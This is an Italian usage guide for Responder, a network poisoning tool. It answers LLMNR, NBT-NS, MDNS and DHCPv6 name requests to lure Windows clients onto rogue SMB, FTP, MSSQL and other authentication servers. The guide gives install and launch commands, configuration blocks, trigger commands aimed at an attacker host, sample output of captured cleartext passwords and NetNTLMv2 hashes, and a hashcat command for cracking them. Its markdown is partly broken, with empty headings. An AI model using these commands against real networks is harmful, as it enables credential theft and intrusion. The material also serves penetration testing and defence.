
Responder è un avvelenatore di LLMNR, NBT-NS e MDNS, con server di autenticazione rogue HTTP/SMB/MSSQL/FTP/LDAP integrato che supporta NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP e autenticazione HTTP Basic.
Responder è un poisoner LLMNR, NBT-NS e MDNS con server di autenticazione rogue integrati per HTTP, SMB, MSSQL, FTP, LDAP, Kerberos, DNS e altro. Supporta NTLMv1/NTLMv2/LMv2, NTLMSSP esteso e vari metodi di autenticazione su oltre 15 protocolli.
Responder cattura le credenziali rispondendo alle richieste di risoluzione dei nomi LLMNR, NBT-NS e MDNS. Quando un client tenta di risolvere un nome host inesistente, Responder risponde, indirizzando il client verso la macchina dell'attaccante dove molteplici server di autenticazione rogue catturano le credenziali. Sono inclusi anche server rogue DHCP e DHCPv6, che possono essere abilitati separatamente.
Dati Catturati:
Questa versione include:
sudo apt-get update sudo apt-get install python3 python3-pip python3-netifaces
### Installare Responder```bash
git clone https://github.com/lgandx/Responder.git
cd Responder
pip3 install -r requirements.txt
sudo python3 Responder.py --help
---
## Avvio rapido
### Avvelenamento base```bash
# Standard LLMNR/NBT-NS poisoning
sudo python3 Responder.py -I eth0 -v
# Analyze mode (passive monitoring)
sudo python3 Responder.py -I eth0 -A -v
sudo python3 Responder.py -I eth0 --dhcpv6 -v
### Forza autenticazione HTTP Basic```bash
sudo python3 Responder.py -I eth0 -b -v
sudo python3 Responder.py -I eth0 -Pvd
---
## Avvelenamento della rete
### Avvelenamento LLMNR/NBT-NS/MDNS
**Scopo:** Rispondere ai fallimenti di risoluzione dei nomi
**Come funziona:**
1. Il client invia una query per un host inesistente
2. Responder risponde: "Sono quell'host"
3. Il client si connette all'attaccante
4. Credenziali catturate
**Configurazione:**```ini
[Responder Core]
LLMNR = On
NBTNS = On
MDNS = On
Utilizzo:```bash sudo python3 Responder.py -I eth0 -v
---
### Server DHCPv6
**Scopo:** Forzare i client a utilizzare il DNS dell'attaccante tramite IPv6
**Caratteristiche:**
- ✅ Supporto INFORMATION-REQUEST (Windows 10/11)
- ✅ Supporto SOLICIT/REQUEST
- ✅ Filtraggio dei domini (targeting chirurgico)
- ✅ Router Advertisement (opzionale)
**Come funziona:**
1. Windows invia DHCPv6 INFORMATION-REQUEST, SOLICIT, REQUEST
2. Responder risponde: DNS = IPv6 dell'attaccante
3. Windows dà priorità al DNS IPv6
4. Tutte le query DNS → attaccante
5. DNS poisoning → cattura delle credenziali
**Configurazione:**```ini
[DHCPv6 Server]
; Only respond to specific domain
DHCPv6_Domain = corp.local
; Send Router Advertisements
SendRA = Off
; IPv6 address to advertise
BindToIPv6 = fe80::1
Utilizzo:```bash sudo python3 Responder.py -I eth0 --dhcpv6 -v
**Risultato previsto:**```
[DHCPv6] INFORMATION-REQUEST from fe80::a1b2:c3d4
[DHCPv6] Client domain: workstation.corp.local
[DHCPv6] Matched target domain: corp.local
[DHCPv6] Responding with DNS: fe80::1
[DNS] Query: mail.corp.local (A)
[DNS] Poisoned: mail.corp.local -> 192.168.1.100
[SMTP] Captured: [email protected]:Password123
Responder include 17+ server di autenticazione rogue:
Scopo: Catturare hash NetNTLM da condivisioni di file
Caratteristiche:
Trigger:```powershell
\attacker-ip\share \non-existent-server\files
net use \attacker-ip\share
\attacker-ip\
**Formato acquisito:**```
username::domain:challenge:response:blob
Cracking:```bash hashcat -m 5600 smb-ntlmv2.txt wordlist.txt
**Configurazione:**```ini
[Responder Core]
SMB = On
Scopo: Catturare le credenziali FTP in chiaro
Caratteristiche:
Attivatori:```bash ftp attacker-ip
**Formato Catturato:**```
[FTP] Cleartext: username:password
Configurazione:```ini [Responder Core] FTP = On
---
### Server di database
#### MSSQL Server (Porta 1433)
**Scopo:** Catturare l'autenticazione di Microsoft SQL Server
**Caratteristiche:**
- ✅ Autenticazione SQL Server
- ✅ Autenticazione Windows (NTLM)
- ✅ Credenziali SQL in chiaro
- ✅ Cattura hash NetNTLMv2
**Trigger:**```sql
-- SQL Server Management Studio
Server: attacker-ip
Authentication: SQL Server / Windows
-- Command line
sqlcmd -S attacker-ip -U sa -P password
-- Connection strings
Server=attacker-ip;Database=master;User Id=sa;Password=pass;
Formati catturati:``` [MSSQL] SQL Auth: sa:password123 [MSSQL] NetNTLMv2: DOMAIN\user::domain:challenge:response:blob
**Configurazione:**```ini
[Responder Core]
SQL = On
Note:
Scopo: Catturare l'autenticazione del client email
Caratteristiche: